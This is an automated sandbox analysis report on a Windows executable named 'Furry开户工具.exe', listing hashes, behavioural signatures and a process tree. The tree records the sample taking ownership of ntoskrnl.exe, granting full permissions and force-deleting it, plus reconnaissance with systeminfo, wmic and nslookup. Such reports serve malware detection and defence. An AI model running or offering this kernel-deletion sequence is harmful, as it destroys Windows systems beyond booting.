Analysis
- max time kernel: 64s
- max time network: 64s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 05-10-2024 08:55
Static task
- static1
Behavioral tasks
- behavioral1: sample Furry开户工具.exe, resource win7-20240903-en
- behavioral2: sample Furry开户工具.exe, resource win10v2004-20240802-en
- behavioral3: sample libcurl-x64.dll, resource win7-20240903-en
- behavioral4: sample libcurl-x64.dll, resource win10v2004-20240802-en
Errors
General
- Target: Furry开户工具.exe
- Size: 370KB
- MD5: 75be151829b2bc2e9e081c1ede0fd0e0
- SHA1: 8cb585ca1e98abe3e3d9dfad899ba516d3583033
- SHA256: 43ed2eb30e5053663f55617b39dc89e8cce80b896c1c57ed507dd52be94c597b
- SHA512: e6f88991819d41dfca51d682f28a829aa745e96e5bc674dac0e7b96e4a03ce6af5a1179fed29f9b73a0239fc695acb98b5b0f044735f9faaa55feaa3e4ca4266
- SSDEEP: 6144:QncHno/Bv6GDKHa1no2/bMgnwj+gQjjU0zhwnJBlTK:ULvDU2/bMZjtgjxzUlTK
Malware Config
Signatures
- Possible privilege escalation attempt (2 IoCs)
  Processes:
  pid | Process
  5012 | icacls.exe
  3424 | takeown.exe
- Modifies file permissions (1 TTPs, 2 IoCs)
  Processes:
  pid | Process
  3424 | takeown.exe
  5012 | icacls.exe
- Unexpected DNS network traffic destination (3 IoCs)
  Network traffic to other servers than the configured DNS servers was detected on the DNS port.
  description | ioc
  Destination IP | 208.67.222.222
  Destination IP | 208.67.222.222
  Destination IP | 208.67.222.222
- File and Directory Permissions Modification: Windows File and Directory Permissions Modification (1 TTPs)
- Indicator Removal: File Deletion (1 TTPs)
  Adversaries may delete files left behind by the actions of their intrusion activity.
- Drops file in System32 directory (3 IoCs)
  Processes:
  description | ioc | Process
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db | OfficeClickToRun.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-wal | OfficeClickToRun.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-shm | OfficeClickToRun.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | OfficeClickToRun.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | OfficeClickToRun.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | OfficeClickToRun.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | OfficeClickToRun.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | OfficeClickToRun.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | OfficeClickToRun.exe
- Gathers system information (1 TTPs, 1 IoCs)
  Runs systeminfo.exe.
- Modifies data under HKEY_USERS (26 IoCs)
  Processes:
  description | ioc | Process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides | OfficeClickToRun.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" | OfficeClickToRun.exe
  Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun | OfficeClickToRun.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | OfficeClickToRun.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | OfficeClickToRun.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
  Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | OfficeClickToRun.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" | OfficeClickToRun.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
  pid | Process
  2356 | Furry开户工具.exe
  2356 | Furry开户工具.exe
- Suspicious behavior: LoadsDriver (64 IoCs)
  Processes (pid): 3672 2084 3828 3556 3504 3888 4504 4784 5072 5056 4136 4500 384 2284 1804 2360 4444 2876 4940 3196 1224 4772 1784 4512 3724 4816 4612 1956 3708 1672 3640 1164 1324 4900 4672 4728 3928 2172 4172 2404 4476 3744 4752 4748 4652 4316 3740 1076 1028 3968 3112 4608 3244 5060 1516 4676 3832 4732 3840 3420 2500 3076 2956 4376
- Suspicious use of AdjustPrivilegeToken (43 IoCs)
  Processes:
  description | pid | Process
  Token: SeIncreaseQuotaPrivilege | 3368 | WMIC.exe
  Token: SeSecurityPrivilege | 3368 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 3368 | WMIC.exe
  Token: SeLoadDriverPrivilege | 3368 | WMIC.exe
  Token: SeSystemProfilePrivilege | 3368 | WMIC.exe
  Token: SeSystemtimePrivilege | 3368 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 3368 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 3368 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 3368 | WMIC.exe
  Token: SeBackupPrivilege | 3368 | WMIC.exe
  Token: SeRestorePrivilege | 3368 | WMIC.exe
  Token: SeShutdownPrivilege | 3368 | WMIC.exe
  Token: SeDebugPrivilege | 3368 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 3368 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 3368 | WMIC.exe
  Token: SeUndockPrivilege | 3368 | WMIC.exe
  Token: SeManageVolumePrivilege | 3368 | WMIC.exe
  Token: 33 | 3368 | WMIC.exe
  Token: 34 | 3368 | WMIC.exe
  Token: 35 | 3368 | WMIC.exe
  Token: 36 | 3368 | WMIC.exe
  Token: SeIncreaseQuotaPrivilege | 3368 | WMIC.exe
  Token: SeSecurityPrivilege | 3368 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 3368 | WMIC.exe
  Token: SeLoadDriverPrivilege | 3368 | WMIC.exe
  Token: SeSystemProfilePrivilege | 3368 | WMIC.exe
  Token: SeSystemtimePrivilege | 3368 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 3368 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 3368 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 3368 | WMIC.exe
  Token: SeBackupPrivilege | 3368 | WMIC.exe
  Token: SeRestorePrivilege | 3368 | WMIC.exe
  Token: SeShutdownPrivilege | 3368 | WMIC.exe
  Token: SeDebugPrivilege | 3368 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 3368 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 3368 | WMIC.exe
  Token: SeUndockPrivilege | 3368 | WMIC.exe
  Token: SeManageVolumePrivilege | 3368 | WMIC.exe
  Token: 33 | 3368 | WMIC.exe
  Token: 34 | 3368 | WMIC.exe
  Token: 35 | 3368 | WMIC.exe
  Token: 36 | 3368 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 3424 | takeown.exe
- Suspicious use of FindShellTrayWindow (1 IoCs)
  Processes:
  pid | Process
  2356 | Furry开户工具.exe
- Suspicious use of SetWindowsHookEx (1 IoCs)
  Processes:
  pid | Process
  2092 | OfficeClickToRun.exe
- Suspicious use of WriteProcessMemory (22 IoCs)
  Processes:
  description | pid | Process | procid_target
  PID 2356 wrote to memory of 648 | 2356 | Furry开户工具.exe | 83
  PID 2356 wrote to memory of 648 | 2356 | Furry开户工具.exe | 83
  PID 648 wrote to memory of 3368 | 648 | cmd.exe | 84
  PID 648 wrote to memory of 3368 | 648 | cmd.exe | 84
  PID 2356 wrote to memory of 3440 | 2356 | Furry开户工具.exe | 86
  PID 2356 wrote to memory of 3440 | 2356 | Furry开户工具.exe | 86
  PID 3440 wrote to memory of 2980 | 3440 | cmd.exe | 87
  PID 3440 wrote to memory of 2980 | 3440 | cmd.exe | 87
  PID 2356 wrote to memory of 4844 | 2356 | Furry开户工具.exe | 88
  PID 2356 wrote to memory of 4844 | 2356 | Furry开户工具.exe | 88
  PID 4844 wrote to memory of 4560 | 4844 | cmd.exe | 89
  PID 4844 wrote to memory of 4560 | 4844 | cmd.exe | 89
  PID 2356 wrote to memory of 1960 | 2356 | Furry开户工具.exe | 91
  PID 2356 wrote to memory of 1960 | 2356 | Furry开户工具.exe | 91
  PID 1960 wrote to memory of 3424 | 1960 | cmd.exe | 92
  PID 1960 wrote to memory of 3424 | 1960 | cmd.exe | 92
  PID 2356 wrote to memory of 3952 | 2356 | Furry开户工具.exe | 93
  PID 2356 wrote to memory of 3952 | 2356 | Furry开户工具.exe | 93
  PID 3952 wrote to memory of 5012 | 3952 | cmd.exe | 94
  PID 3952 wrote to memory of 5012 | 3952 | cmd.exe | 94
  PID 2356 wrote to memory of 5032 | 2356 | Furry开户工具.exe | 95
  PID 2356 wrote to memory of 5032 | 2356 | Furry开户工具.exe | 95
Processes (tree; indentation shows parent/child depth)
- C:\Users\Admin\AppData\Local\Temp\Furry开户工具.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Furry开户工具.exe"
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of WriteProcessMemory
  PID: 2356
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c wmic nicconfig get ipaddress
    Signatures: Suspicious use of WriteProcessMemory
    PID: 648
    - C:\Windows\System32\Wbem\WMIC.exe
      Command line: wmic nicconfig get ipaddress
      Signatures: Suspicious use of AdjustPrivilegeToken
      PID: 3368
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com
    Signatures: Suspicious use of WriteProcessMemory
    PID: 3440
    - C:\Windows\system32\nslookup.exe
      Command line: nslookup myip.opendns.com resolver1.opendns.com
      PID: 2980
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c systeminfo
    Signatures: Suspicious use of WriteProcessMemory
    PID: 4844
    - C:\Windows\system32\systeminfo.exe
      Command line: systeminfo
      Signatures: Gathers system information
      PID: 4560
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c takeown /f "C:\Windows\System32\ntoskrnl.exe"
    Signatures: Suspicious use of WriteProcessMemory
    PID: 1960
    - C:\Windows\system32\takeown.exe
      Command line: takeown /f "C:\Windows\System32\ntoskrnl.exe"
      Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
      PID: 3424
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c icacls "C:\Windows\System32\ntoskrnl.exe" /grant Admin:F
    Signatures: Suspicious use of WriteProcessMemory
    PID: 3952
    - C:\Windows\system32\icacls.exe
      Command line: icacls "C:\Windows\System32\ntoskrnl.exe" /grant Admin:F
      Signatures: Possible privilege escalation attempt; Modifies file permissions
      PID: 5012
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c del "C:\Windows\System32\ntoskrnl.exe" /f /s /q
    PID: 5032
- C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  Command line: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  Signatures: Drops file in System32 directory; Checks processor information in registry; Enumerates system info in registry; Modifies data under HKEY_USERS; Suspicious use of SetWindowsHookEx
  PID: 2092
- C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
  PID: 808
- C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  PID: 3372
- C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
  PID: 748